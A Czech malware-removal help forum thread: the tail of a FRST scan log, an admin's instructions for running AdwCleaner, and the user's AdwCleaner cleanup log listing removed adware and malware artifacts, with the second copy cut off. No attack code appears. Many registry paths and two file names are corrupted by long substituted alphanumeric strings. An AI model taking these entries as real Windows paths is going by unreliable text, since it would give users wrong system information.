2020-01-15 21:37 - 2019-12-17 01:01 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:01 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:00 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 00:56 - 013838336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-01-15 21:37 - 2019-12-17 00:52 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:43 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-01-15 21:37 - 2019-12-17 00:41 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-01-15 21:37 - 2019-12-17 00:39 - 001331712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:38 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-01-15 21:37 - 2019-12-12 04:35 - 000271872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:34 - 000253952 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-12 04:28 - 000301568 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:27 - 000284160 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-10 10:36 - 000375008 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2020-01-15 21:37 - 2019-12-10 09:38 - 001549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000544768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000328704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sti.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 003165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002319360 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000670208 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000583168 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000295424 _____ (Microsoft Corporation) C:\Windows\system32\sti.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000191488 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:23 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000428544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 006136320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 002651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-01-15 21:37 - 2019-12-10 09:16 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serscan.sys
2020-01-15 21:37 - 2019-12-10 09:15 - 000594432 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:15 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:14 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:01 - 003233280 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-01-15 21:37 - 2019-12-10 08:56 - 000754176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-01-15 21:37 - 2019-12-10 07:17 - 007084032 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\Users\Public\Desktop\A bootable USB.lnk
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\ProgramData\Desktop\A bootable USB.lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-02-06 21:28 - 2019-05-12 10:51 - 000000000 ____D C:\Program Files\SoftEther VPN Client
2020-02-06 21:10 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-02-06 21:10 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-02-06 21:09 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-02-06 21:09 - 2018-01-07 22:45 - 000003372 _____ C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
2020-02-06 21:09 - 2018-01-07 22:45 - 000003244 _____ C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
2020-02-06 21:04 - 2009-07-14 06:13 - 000006170 _____ C:\Windows\system32\PerfStringBackup.INI
2020-02-06 21:04 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-02-06 20:58 - 2018-01-07 19:36 - 000000000 ____D C:\Users\Jomko\AppData\LocalLow\Mozilla
2020-02-06 20:58 - 2018-01-07 19:33 - 000000000 __SHD C:\Users\Jomko\IntelGraphicsProfiles
2020-02-06 20:58 - 2018-01-07 19:27 - 000000000 ____D C:\ProgramData\NVIDIA
2020-02-06 20:58 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-01-26 22:57 - 2018-01-08 09:18 - 000001024 ____H C:\AMTAG.BIN
2020-01-26 21:01 - 2009-07-14 06:08 - 000032566 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-01-26 20:16 - 2018-06-15 20:12 - 000037692 _____ C:\Windows\ntbtlog.txt
2020-01-26 20:13 - 2009-07-14 05:45 - 000012288 _____ C:\Windows\system32\umstartup.etl
2020-01-26 17:50 - 2018-01-12 17:01 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2020-01-26 15:18 - 2018-02-15 20:31 - 000000000 ____D C:\Users\Jomko\AppData\Local\CrashDumps
2020-01-24 21:54 - 2018-01-16 15:01 - 000000000 ____D C:\Windows\Minidump
2020-01-24 16:33 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\FileZilla
2020-01-23 00:40 - 2018-01-07 22:46 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-01-22 23:07 - 2018-01-11 14:10 - 000000000 ____D C:\ProgramData\Package Cache
2020-01-22 23:06 - 2018-01-07 22:53 - 000000000 ____D C:\Portable
2020-01-22 20:07 - 2018-05-28 20:39 - 000000000 ____D C:\Users\Jomko\Documents\Bluetooth Folder
2020-01-22 20:05 - 2009-07-14 03:34 - 000000215 _____ C:\Windows\system.ini
2020-01-22 20:04 - 2009-07-14 03:34 - 095895552 _____ C:\Windows\system32\config\SOFTWARE.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 023920640 _____ C:\Windows\system32\config\SYSTEM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 001847296 _____ C:\Windows\system32\config\DEFAULT.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000061440 _____ C:\Windows\system32\config\SAM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000028672 _____ C:\Windows\system32\config\SECURITY.bak
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\SysWOW64\NV
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\system32\NV
2020-01-22 17:10 - 2019-10-20 16:56 - 000000000 ____D C:\Users\Jomko\Desktop\Staré údaje Firefoxu
2020-01-22 15:00 - 2018-01-07 19:36 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-22 13:31 - 2018-01-11 23:49 - 000000000 ____D C:\Users\Jomko\AppData\Local\ElevatedDiagnostics
2020-01-22 13:31 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF
2020-01-21 17:06 - 2018-03-14 20:52 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-01-21 17:06 - 2018-02-13 09:42 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-21 17:06 - 2018-02-13 09:42 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-21 17:06 - 2018-02-13 09:42 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-21 17:06 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-21 11:02 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Local\FileZilla
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\Program Files\FileZilla FTP Client
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\Program Files\Java
2020-01-20 20:31 - 2019-05-24 18:27 - 000129088 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-01-18 12:45 - 2018-01-23 15:41 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\XnView
2020-01-17 14:13 - 2018-01-12 21:25 - 000004608 _____ C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-01-16 15:00 - 2018-01-08 09:18 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant Standard Edition 6.6
2020-01-16 13:58 - 2019-03-29 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Logishrd
2020-01-16 13:58 - 2018-02-21 21:47 - 000000000 ____D C:\Users\Jomko\AppData\Local\Deployment
2020-01-15 23:15 - 2009-07-14 05:45 - 000360416 _____ C:\Windows\system32\FNTCACHE.DAT
2020-01-15 21:45 - 2018-01-07 22:46 - 000000000 ____D C:\Windows\system32\MRT
2020-01-15 21:40 - 2018-01-07 22:46 - 120202352 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-01-08 00:08 - 2019-05-24 18:28 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\.minecraft
==================== Files in the root of some directories ========
2018-01-12 20:03 - 2018-01-12 20:03 - 000000437 _____ () C:\Users\Jomko\AppData\Roaming\ImageTuner.ini
2018-01-12 21:25 - 2020-01-17 14:13 - 000004608 _____ () C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-01-10 00:20 - 2018-01-10 00:20 - 000000001 _____ () C:\Users\Jomko\AppData\Local\llftool.4.40.agreement
2019-07-15 23:58 - 2019-07-15 23:58 - 000015468 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel
2019-07-11 06:58 - 2019-07-11 06:58 - 000012216 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel.NCNJ4Z
2018-03-22 16:27 - 2019-04-14 22:21 - 000007610 _____ () C:\Users\Jomko\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2020-01-18 14:26
==================== End of FRST.txt ========================
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
Prosím o kontrolu logu FRST
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
-
Rudy
- Site Admin
- Příspěvky: 118275
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu FRST
Zdravím!
Spusťte tuto utilitu:
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/
ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu FRST
spustil som, toto je výsledok
# -------------------------------
# Malwarebytes AdwCleaner 8.0.2.0
# -------------------------------
# Build: 01-27-2020
# Database: 2020-01-24.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-07-2020
# Duration: 00:00:02
# OS: Windows 7 Professional
# Cleaned: 70
# Failed: 1
***** [ Services ] *****
Deleted Main Service
Deleted WinDefender
***** [ Folders ] *****
Deleted C:\Users\Jomko\AppData\Local\DriverToolkit
Deleted C:\Users\Jomko\AppData\Roaming\EpicNet Inc
Not Deleted C:\Windows\rss
***** [ Files ] *****
Deleted C:\Windows\Reimage.ini
Deleted C:\Windows\System32\drivers\Winmon.sys
Deleted C:\Windows\System32\drivers\WinmonFS.sys
Deleted C:\Windows\System32\drivers\WinmonProcessMonitor.sys
Deleted C:\Windows\restoro.ini
Deleted C:\Windows\windefender.exe
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
Deleted C:\Windows\System32\Tasks\SCHEDULEDUPDATE
***** [ Registry ] *****
Deleted HKCU\Software\DriverToolkit
Deleted HKCU\Software\EpicNet Inc.
Deleted HKCU\Software\GCleaner
Deleted HKCU\Software\Lavasoft\Web Companion
Deleted HKCU\Software\Local AppWizard-Generated Applications\Restoro
Deleted HKCU\Software\Microsoft\Internet Explorer\Main|Start Page
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7xt\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nternet Settings\ZoneMap\Domains\webcompanion.com
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7un|cloudnet
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ninstall\CloudNet
Deleted HKCU\Software\Reimage
Deleted HKCU\Software\Restoro
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ntrol.DLL
Deleted HKLM\SOFTWARE\MICROSOFT\Speedycar
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0760CF23-E27C-42D7-9E44-6B3896E46166}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted HKLM\Software\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted HKLM\Software\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted HKLM\Software\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Deleted HKLM\Software\Classes\CLSID\{AE198C69-7358-4856-9029-F4C0FAD524C1}
Deleted HKLM\Software\Classes\CLSID\{BA827421-E282-479E-AE60-34796877B8AE}
Deleted HKLM\Software\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted HKLM\Software\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted HKLM\Software\Classes\REI_AxControl.ReiEngine
Deleted HKLM\Software\Classes\REI_AxControl.ReiEngine.1
Deleted HKLM\Software\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7sktopnew
Deleted HKLM\Software\Reimage
Deleted HKLM\Software\Restoro
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7eb Companion
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\AddressBook|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\AddressBook|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Aomei Partition Assistant_is1|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Aomei Partition Assistant_is1|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Connection Manager|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Connection Manager|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\DirectDrawEx|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\DirectDrawEx|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Fontcore|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Fontcore|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE40|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE40|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE4Data|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE4Data|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE5BAKEX|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE5BAKEX|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IEData|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IEData|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\MobileOptionPack|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\MobileOptionPack|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\SchedulingAgent|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\SchedulingAgent|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\WIC|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\WIC|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7KzPTw5jtS38n2tVEGi.DLL
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nterface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nterface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [8322 octets] - [07/02/2020 20:41:39]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 8.0.2.0
# -------------------------------
# Build: 01-27-2020
# Database: 2020-01-24.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-07-2020
# Duration: 00:00:02
# OS: Windows 7 Professional
# Cleaned: 70
# Failed: 1
***** [ Services ] *****
Deleted Main Service
Deleted WinDefender
***** [ Folders ] *****
